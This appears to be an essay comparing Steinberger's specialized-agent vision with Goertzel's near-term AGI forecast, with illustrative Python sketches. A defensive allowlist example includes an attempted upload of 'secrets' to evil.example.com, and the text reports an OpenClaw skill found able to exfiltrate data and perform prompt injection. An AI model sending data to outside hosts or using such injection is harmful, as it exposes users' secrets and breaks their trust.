Two Visions of AI’s Future, One Week Apart
Three days apart in early February 2026, two very different voices articulated two very different futures for artificial intelligence. On the 8th, Peter Steinberger—the Austrian developer whose open-source AI agent OpenClaw had exploded to 160,000 GitHub stars practically overnight—told Y Combinator that the future belongs to swarms of specialized AIs, not a single all-powerful one. On the 11th, Ben Goertzel—the computer scientist who coined the term “artificial general intelligence” more than twenty years ago—told a Hong Kong conference that AI would surpass human strategic thinking within two years.
Same week. Same industry. Completely opposite conclusions about where it’s all heading.
This isn’t a niche academic debate. The answer determines how hundreds of billions of dollars get allocated, which companies survive, and what skills matter for the next decade. If the AGI camp is right, we’re building toward a single transformative moment—and everyone not building toward that moment is wasting time. If the specialization camp is right, the entire AGI race is a misallocation of capital chasing a mirage, and the real money is in narrow, deep, unglamorous tools that solve specific problems extraordinarily well.
Peter Steinberger: an Austrian developer who sold his PDF company for roughly €100 million, then came out of retirement to build OpenClaw, a local-first AI agent that runs on your own computer and controls your apps. It drew 160,000 GitHub stars in days. He argues that the future isn’t one giant brain; it’s countless specialized agents collaborating, the way human society already works.
Ben Goertzel: a computer scientist and mathematician who has spent three decades working toward machines that match and exceed human-level reasoning. He leads SingularityNET, a decentralized AI marketplace, and the Artificial Superintelligence (ASI) Alliance. He claims we’re two years from AI that out-thinks humans at high-level strategy.
What One Human Can’t Do Alone
Steinberger’s argument starts with a deceptively simple question: “What can one human being actually achieve? Do you think one human being could make an iPhone, or one human being could go to space?”
His point: humans are already specialized. We build civilizations not through individual omniscience but through vast networks of specialists who collaborate. An engineer doesn’t need to understand patent law. A surgeon doesn’t need to know how to grow wheat. The power comes from the system, not the individual node.
Steinberger believes AI should follow the same pattern. Rather than building one model that knows everything—the AGI dream—we should build swarms of focused, capable agents that each do one thing brilliantly, then let them coordinate. He calls this “swarm intelligence,” and OpenClaw is his proof of concept.
OpenClaw itself is a living example of this philosophy. It doesn’t try to be superintelligent. It runs locally on your computer, calls external LLM APIs when it needs language capability, and orchestrates across messaging platforms, file systems, smart home devices, and more. When Steinberger sent it a voice message and it didn’t have a speech-recognition model installed, it didn’t crash. It wrote its own API call to OpenAI’s Whisper service, transcribed the audio, and replied—all in nine seconds, with no pre-written script.
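OpenClaw’s generated code isn’t published, but a minimal sketch of that kind of improvised call, assuming the official OpenAI Python SDK and an `OPENAI_API_KEY` in the environment, might look like this:

```python
# Sketch: the kind of one-off transcription call an agent might compose
# when it lacks a local speech model. Assumes the official OpenAI Python
# SDK; OpenClaw's actual generated code is not published, so this is
# illustrative only.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def transcribe_voice_message(path: str) -> str:
    """Send an audio file to OpenAI's hosted Whisper model, return text."""
    with open(path, "rb") as audio:
        result = client.audio.transcriptions.create(
            model="whisper-1",
            file=audio,
        )
    return result.text

print(transcribe_voice_message("voice_message.ogg"))
```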
That’s not general intelligence. That’s a specialized agent being resourceful within a well-defined scope. And to Steinberger, that’s the point. The models we already have are good enough as building blocks. The engineering challenge isn’t making them smarter—it’s making them useful, composable, and personal.
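What “composable” means in practice is easier to show than to tell. Here is a deliberately tiny sketch of the swarm pattern, with stub specialists standing in for real model and device integrations; none of this is OpenClaw’s actual code:

```python
# Hedged sketch of the "swarm" pattern: small specialist agents behind a
# router, each scoped to one job. The specialists here are stubs; in a
# real system each would wrap its own model, API, or device integration.
from typing import Callable

def transcriber(task: str) -> str:
    return f"[transcript of {task}]"

def scheduler(task: str) -> str:
    return f"[calendar event created for {task}]"

def home_controller(task: str) -> str:
    return f"[lights adjusted: {task}]"

# The router is deliberately dumb: capability lives in the specialists,
# coordination lives here, and nothing in the system is "general".
SPECIALISTS: dict[str, Callable[[str], str]] = {
    "audio": transcriber,
    "calendar": scheduler,
    "home": home_controller,
}

def dispatch(kind: str, task: str) -> str:
    agent = SPECIALISTS.get(kind)
    if agent is None:
        raise ValueError(f"no specialist for {kind!r}")  # fail loudly, in scope
    return agent(task)

print(dispatch("calendar", "dentist, Tuesday 9am"))
```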
OpenClaw by the numbers: more than 160,000 GitHub stars and 2 million website visitors in its first week; roughly 300,000 lines of code; Signal, Telegram, Discord, and WhatsApp supported as interfaces; fully local operation, with the agent’s memory stored as a folder of Markdown files on your machine. And Steinberger’s boldest prediction: 80% of today’s apps will completely disappear, replaced by goal-driven agents that coordinate tasks across systems.
The 80% Prediction
Steinberger extends this logic to a provocative conclusion: most apps are just database frontends—pretty interfaces for entering and retrieving data. When AI agents can read, write, and coordinate data directly, the interface layer becomes unnecessary. His example: why do you need a calorie-tracking app when your agent already knows what you ate, understands your goals, and automatically adjusts your workout plan?
Only apps with unique hardware interfaces or sensor access will survive, he argues. Everything else is overhead that agents will quietly absorb. It’s a vision of AI that has nothing to do with superintelligence and everything to do with plumbing—connecting systems, automating workflows, and eliminating friction.
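To make the claim concrete, here is a hypothetical sketch of the no-app pattern: the agent’s memory is plain files, a function replaces the interface, and the file names and daily calorie budget are invented for illustration:

```python
# Hypothetical sketch of the "no-app" pattern Steinberger describes:
# the agent's memory is plain Markdown files, and a goal replaces an
# interface. Paths and the 2,200 kcal budget are assumptions.
from datetime import date
from pathlib import Path

MEMORY = Path.home() / "agent-memory"          # a folder of Markdown files

def log_meal(description: str, kcal: int) -> int:
    """Append a meal to today's log and return calories still available."""
    log = MEMORY / f"meals-{date.today().isoformat()}.md"
    log.parent.mkdir(parents=True, exist_ok=True)
    with log.open("a") as f:
        f.write(f"- {description}: {kcal} kcal\n")
    eaten = sum(
        int(line.rsplit(":", 1)[1].split()[0])
        for line in log.read_text().splitlines()
        if line.startswith("- ")
    )
    return 2200 - eaten                         # assumed daily budget

remaining = log_meal("lentil soup", 450)
print(f"{remaining} kcal left today")
```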
Two Years Until We’re Outthought
Ben Goertzel sees a different future, and he has a timeline: two years. Speaking at Consensus Hong Kong on February 11, the man who coined “artificial general intelligence” predicted that AI will surpass human strategic thinking by roughly 2028. Not narrow tasks. Not pattern matching. High-level, imaginative, strategic reasoning—the kind of thinking that, until now, has been the uniquely human contribution.
Goertzel’s argument rests on trajectory rather than present capability. He concedes that current AI systems, including his own Quantium project for predicting Bitcoin volatility, are good at specific predictive tasks but still lack the kind of open-ended strategic imagination that humans bring to complex, novel situations. But he believes that gap is closing rapidly, and that the convergence of large language models, decentralized AI infrastructure, and new architecture paradigms will produce genuine general intelligence within the decade.
It’s a position he’s held consistently for years. At the Web Summit in 2023, he predicted AGI was “only a few years away,” and in an interview that same year he estimated AI could replace 80% of human jobs in the near term even without achieving AGI. For 2026, he published nine predictions that describe not a single dramatic breakthrough but a “steady accumulation of advances” bringing AI closer to the threshold of human-level thinking.
The Infrastructure Argument
For Goertzel, the current market cycle isn’t a bubble—it’s a “stress test” for the infrastructure that will eventually host AGI. SingularityNET, his decentralized AI marketplace, aims to provide the coordination layer for AI systems that are more than the sum of their parts. Where Steinberger sees swarms of specialized agents as the endpoint, Goertzel sees them as a stepping stone toward something qualitatively different: a unified intelligence that emerges from the interaction of many specialized components.
This is the subtle but crucial difference between the two camps. Both believe in distributed, collaborating AI systems. But Steinberger thinks the collaboration itself is the product—and that no emergent “super-intelligence” is necessary or likely. Goertzel thinks the collaboration is the mechanism by which genuine general intelligence will arise.
AGI as Fiction, Engineering as Discipline
Steinberger is not alone in his skepticism. One of the most rigorous critiques of the AGI paradigm comes from Timnit Gebru, the computer scientist who co-led Google’s Ethical AI team before being fired in 2020 and went on to found the Distributed AI Research Institute (DAIR).
In a November 2025 video published by Nature—alongside voices from Anthropic, DeepMind, and Microsoft AI—Gebru called AGI a “fictional thing.” Her argument is structural: the backbone of engineering lies in building well-scoped, testable systems. You cannot meaningfully test or evaluate an undefined system. And AGI, by its nature, is undefined—a moving goalpost that expands every time existing AI achieves something new.
In a 2024 academic paper co-authored with Émile P. Torres, Gebru went further, tracing the intellectual roots of the AGI movement to 20th-century eugenics and arguing that the pursuit of an undefined “machine god” is pushing the industry toward labor exploitation, environmental damage, and the centralization of power under the language of “benefiting humanity.”
Timnit Gebru: “AGI is a fictional thing. The backbone of engineering lies in building well-scoped, testable systems. The pursuit of an undefined ‘machine god’ pushes the industry toward deeper labor exploitation and environmental damage.”
Peter Steinberger: “Even if models are general-purpose, shouldn’t they also move towards specialization? What can one human being actually achieve alone? Swarm intelligence—specialized AIs working together—will replace the dream of a single all-powerful AI.”
Ben Goertzel: “The human brain is better at taking the imaginative leap to understand the unknown. It won’t last, though. We should enjoy it for a couple more years. The current cycle is a stress test for the infrastructure that will host AGI.”
Andy Markus, AT&T: “Fine-tuned small language models will be the big trend and become a staple used by mature AI enterprises in 2026, as the cost and performance advantages will drive usage over out-of-the-box LLMs.”
The Engineering Pragmatist Position
Gebru’s critique resonates with a growing cohort of practitioners who are less interested in whether we’re building toward AGI and more interested in whether the systems they ship today actually work reliably. Their argument: even if AGI were achievable, the most urgent problems in AI are mundane—bias in hiring algorithms, hallucination in medical contexts, security vulnerabilities in agentic systems, the environmental cost of training runs. Chasing the summit while ignoring the base camp is how people die on mountains.
Cisco’s AI security research team recently tested a third-party OpenClaw skill and found that it could exfiltrate data and carry out prompt injection without the user’s awareness. One of OpenClaw’s own maintainers warned on Discord that the project is “far too dangerous” for anyone who can’t understand command-line operations. Even the specialization camp has real problems to solve before its vision works safely at scale. But at least those problems are well-scoped and testable—which is precisely Gebru’s point.
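Those problems do admit well-scoped fixes. As one illustration (a hypothetical defense, not Cisco’s test methodology or OpenClaw’s real skill API), outbound traffic from a skill can be forced through a host allowlist so exfiltration fails loudly:

```python
# Hypothetical defensive sketch (not Cisco's test or OpenClaw's API):
# wrap a skill's outbound HTTP in an allowlist so a malicious skill
# cannot quietly ship data to an attacker-controlled host.
from urllib.parse import urlparse
import urllib.request

ALLOWED_HOSTS = {"api.openai.com"}   # everything else is refused

def guarded_fetch(url: str, data: bytes | None = None) -> bytes:
    host = urlparse(url).hostname or ""
    if host not in ALLOWED_HOSTS:
        raise PermissionError(f"skill tried to reach non-allowlisted host: {host}")
    with urllib.request.urlopen(url, data=data, timeout=10) as resp:
        return resp.read()

# A well-scoped, testable property, in Gebru's sense: the bad path
# raises before any bytes leave the machine.
try:
    guarded_fetch("https://evil.example.com/upload", data=b"secrets")
except PermissionError as e:
    print(e)
```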
Vertical AI Is Already Winning
While philosophers and futurists debate whether AGI is possible or desirable, the market is placing its bets—and the money is flowing toward specialization. The consensus among founders, investors, and enterprise buyers in early 2026 is increasingly clear: the general-purpose model bubble is deflating, and vertical AI is where the value lives.
The pattern plays out across industries. Tempus, which processes clinical and molecular data across oncology, cardiology, and infectious disease, went public with AI systems trained exclusively on medical data. JPMorgan Chase’s Contract Intelligence platform reviews commercial loan agreements using models trained on financial documents, not general web text. John Deere’s See & Spray technology identifies individual weeds in real time using vision models that know nothing about poetry or code—but know everything about agricultural pest identification.
AT&T’s chief data officer, Andy Markus, predicted in January that fine-tuned small language models (SLMs) would become the standard for mature enterprises in 2026, driven by cost and performance advantages over general-purpose LLMs. Mistral, the French open-weight AI startup, has been making similar arguments: their smaller models outperform much larger ones on specific benchmarks after domain-specific fine-tuning.
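The mechanics behind that prediction are standard. A rough sketch of domain fine-tuning a small open-weight model with Hugging Face transformers follows; the model name, dataset file, and hyperparameters are illustrative assumptions, not anything AT&T or Mistral has published:

```python
# Rough sketch: domain fine-tuning a small open-weight model with
# Hugging Face transformers. Model name, dataset file, and all
# hyperparameters are illustrative assumptions.
from datasets import load_dataset
from transformers import (AutoModelForCausalLM, AutoTokenizer,
                          DataCollatorForLanguageModeling, Trainer,
                          TrainingArguments)

model_name = "Qwen/Qwen2.5-0.5B"                # any small open-weight model
tok = AutoTokenizer.from_pretrained(model_name)
tok.pad_token = tok.pad_token or tok.eos_token  # ensure a padding token
model = AutoModelForCausalLM.from_pretrained(model_name)

# Hypothetical domain corpus: one {"text": ...} JSON object per line.
data = load_dataset("json", data_files="loan_agreements.jsonl")["train"]
data = data.map(
    lambda batch: tok(batch["text"], truncation=True, max_length=512),
    batched=True,
    remove_columns=data.column_names,
)

trainer = Trainer(
    model=model,
    args=TrainingArguments(output_dir="slm-finetuned",
                           per_device_train_batch_size=4,
                           num_train_epochs=1),
    train_dataset=data,
    # mlm=False => next-token (causal) objective with padding masked out
    data_collator=DataCollatorForLanguageModeling(tok, mlm=False),
)
trainer.train()
```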
The Context Moat
The most interesting strategic insight from the vertical AI movement is what practitioners are calling the “context moat.” In a world where foundation models are commoditized—where Qwen, DeepSeek, Llama, and Mistral offer increasingly competitive open-weight alternatives to proprietary models—the sustainable competitive advantage isn’t the model itself. It’s the proprietary data, the domain-specific reasoning chains, and the regulatory knowledge that a general model cannot replicate without massive fine-tuning.
A legal AI startup in 2026 doesn’t just summarize documents; it understands the case law of a specific jurisdiction and can predict the likelihood of a ruling based on historical patterns. A dental scheduling agent outperforms a generic booking tool because it understands insurance verification workflows and treatment scheduling constraints. These are unglamorous problems. They don’t make for exciting keynotes. But they make for profitable companies, and those companies retain customers at three to five times the rate of horizontal solutions.
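A toy sketch makes the moat tangible: the model is interchangeable, but the jurisdiction-specific corpus and the retrieval step in front of it are not. The corpus and the scoring below are deliberately simplistic inventions:

```python
# Toy sketch of a "context moat": the base model is commodity; the edge
# is retrieving proprietary, jurisdiction-specific context before asking
# it anything. Corpus and scoring are deliberately simplistic assumptions.
CASE_LAW = {  # proprietary corpus a generic tool would not have
    "NY-2019-114": "Late assignment of claims bars recovery unless...",
    "NY-2021-042": "Insurance verification must precede scheduling when...",
    "CA-2020-77":  "California applies a discovery rule to...",
}

def retrieve(query: str, jurisdiction: str, k: int = 2) -> list[str]:
    """Rank in-jurisdiction passages by crude keyword overlap."""
    terms = set(query.lower().split())
    scored = [
        (len(terms & set(text.lower().split())), doc_id, text)
        for doc_id, text in CASE_LAW.items()
        if doc_id.startswith(jurisdiction)
    ]
    return [f"{d}: {t}" for s, d, t in sorted(scored, reverse=True)[:k] if s]

context = retrieve("is recovery barred by late assignment", "NY")
print(context)  # this context, not the base model, is the moat
```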
Both Are Right. Neither Is Complete.
The honest answer to “specialization or superintelligence?” is that the debate itself reveals more about the debaters than the technology. Steinberger is a builder. His frame of reference is the next twelve months: what can agents do today, what breaks, what users actually need. Goertzel is a theorist. His frame is the next twelve years: what might intelligence become, where are the mathematical limits, what happens at the threshold?
Both perspectives are useful. Neither alone is sufficient.
Steinberger is right that the immediate future of AI is specialization. The enterprise market in 2026 is emphatically voting with its dollars for narrow, deep, reliable tools over general-purpose moonshots. The most successful AI deployments are boring: document processing, appointment scheduling, inventory optimization, compliance monitoring. These problems don’t need AGI. They need well-scoped systems that work correctly every time and fail gracefully when they can’t.
Goertzel is right that capabilities are converging in ways that make the “narrow vs. general” distinction increasingly blurry. Frontier LLMs already demonstrate broad competence across dozens of domains. Agentic systems that chain specialized models together are beginning to exhibit behaviors that look, from the outside, a lot like flexible general-purpose reasoning. Whether that constitutes “AGI” depends entirely on your definition—which is part of why Gebru calls the term fictional in the first place.
The Human Loop
For the humans in the loop, the practical takeaway is this: ignore the eschatology. Whether AGI arrives in two years, twenty, or never, the work is the same. Build for the problem in front of you. Use the most capable tools available. Scope your systems so they can be tested and evaluated. Don’t confuse aspirational naming with actual capability.
Steinberger built OpenClaw by himself, in his kitchen, using existing APIs and Unix tools. It reached 160,000 stars because it solved a real problem: letting a computer do things on your behalf. Not because it was intelligent in some cosmic sense, but because it was useful in a mundane one. That’s the lesson the specialization camp offers, and it’s one worth absorbing even if you believe Goertzel’s timeline.
Because whether or not a machine eventually out-thinks us, the machines we have today are powerful enough to reshape entire industries—if we stop waiting for the god and start building the plumbing. The revolution doesn’t need to be general to be transformative. It just needs to work.